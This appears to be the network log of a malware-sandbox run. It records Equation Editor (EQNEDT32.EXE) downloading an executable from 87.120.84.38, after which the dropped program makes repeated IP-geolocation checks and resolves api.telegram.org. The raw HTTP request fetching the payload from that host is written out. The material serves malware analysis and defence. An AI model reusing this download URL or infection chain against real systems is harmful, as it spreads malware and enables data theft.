                                                                                                          Oct 30, 2024 08:19:49.640739918 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.910387993 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.936325073 CET49164443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.936436892 CET44349164188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.936543941 CET49164443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.955605030 CET49164443192.168.2.22188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                          Oct 30, 2024 08:19:56.986504078 CET8.8.8.8192.168.2.220x496fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:57.668102026 CET8.8.8.8192.168.2.220x9000No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:57.668102026 CET8.8.8.8192.168.2.220x9000No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.480370998 CET8.8.8.8192.168.2.220xed38No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:58.489315987 CET8.8.8.8192.168.2.220xbbe3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:59.425887108 CET8.8.8.8192.168.2.220x7350No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:19:59.425887108 CET8.8.8.8192.168.2.220x7350No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.232402086 CET8.8.8.8192.168.2.220xb487No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:00.242186069 CET8.8.8.8192.168.2.220x5783No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.072565079 CET8.8.8.8192.168.2.220x1916No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.072565079 CET8.8.8.8192.168.2.220x1916No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.865276098 CET8.8.8.8192.168.2.220x47ebNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:04.874428988 CET8.8.8.8192.168.2.220xd6b2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.398642063 CET8.8.8.8192.168.2.220x4ac7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:13.410800934 CET8.8.8.8192.168.2.220x2a15No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:14.276907921 CET8.8.8.8192.168.2.220x12b1No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:14.276907921 CET8.8.8.8192.168.2.220x12b1No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:20:15.108767033 CET8.8.8.8192.168.2.220x7160No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • 87.120.84.38
                                                                                                          • checkip.dyndns.org
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.22  49161  87.120.84.38  80  3256  C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp  Bytes transferred  Direction  Data
Oct 30, 2024 08:19:40.220944881 CET  322  OUT  GET /txt/qHbynE8Vgwabsy3.exe HTTP/1.1
                                                                                                          Accept: */*
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                          Host: 87.120.84.38
                                                                                                          Connection: Keep-Alive
Oct 30, 2024 08:19:41.176788092 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                          Server: nginx/1.26.2
                                                                                                          Date: Wed, 30 Oct 2024 07:19:41 GMT
                                                                                                          Content-Type: application/x-msdos-program
                                                                                                          Content-Length: 787968
                                                                                                          Connection: keep-alive
                                                                                                          Last-Modified: Tue, 29 Oct 2024 06:19:00 GMT
                                                                                                          ETag: "c0600-625978f9ea95d"
                                                                                                          Accept-Ranges: bytes


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.2.22  49162  132.226.8.169  80  3512  C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp  Bytes transferred  Direction  Data
Oct 30, 2024 08:19:46.457041025 CET  151  OUT  GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
Oct 30, 2024 08:19:47.347378969 CET  275  IN  HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:47 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:19:47.370827913 CET  127  OUT  GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
Oct 30, 2024 08:19:47.654726028 CET  275  IN  HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:47 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:19:47.874475002 CET  275  IN  HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:47 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:19:49.635246038 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
Oct 30, 2024 08:19:49.910387993 CET | 275 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:19:50.122411013 CET | 275 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49165 | 132.226.8.169 | 80 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:19:51.534768105 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
Oct 30, 2024 08:19:52.456062078 CET | 275 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49167 | 132.226.8.169 | 80 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:19:53.283766031 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
Oct 30, 2024 08:19:54.286794901 CET | 275 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:54 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:19:54.502480030 CET | 275 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:54 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49169 | 158.101.44.242 | 80 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:19:55.156331062 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
Oct 30, 2024 08:19:55.794917107 CET | 323 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:55 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: b2391bd115101780eb30167e84c03f14
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:19:56.011091948 CET | 323 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:55 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: b2391bd115101780eb30167e84c03f14
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49171 | 193.122.130.0 | 80 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:19:56.992698908 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
Oct 30, 2024 08:19:57.647878885 CET | 323 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:57 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 94d497cde5c38cebfb8bbcf64a0414a6
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 08:19:57.858486891 CET | 323 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:57 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 94d497cde5c38cebfb8bbcf64a0414a6
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49173 | 132.226.8.169 | 80 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:19:58.495301962 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
Oct 30, 2024 08:19:59.411719084 CET | 275 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:59 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.22 | 49175 | 132.226.247.73 | 80 | 3512 | C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:20:00.248311043 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
Oct 30, 2024 08:20:04.059225082 CET | 323 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:03 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: a07a3f6d5f25edf84fec4c136e474a1a
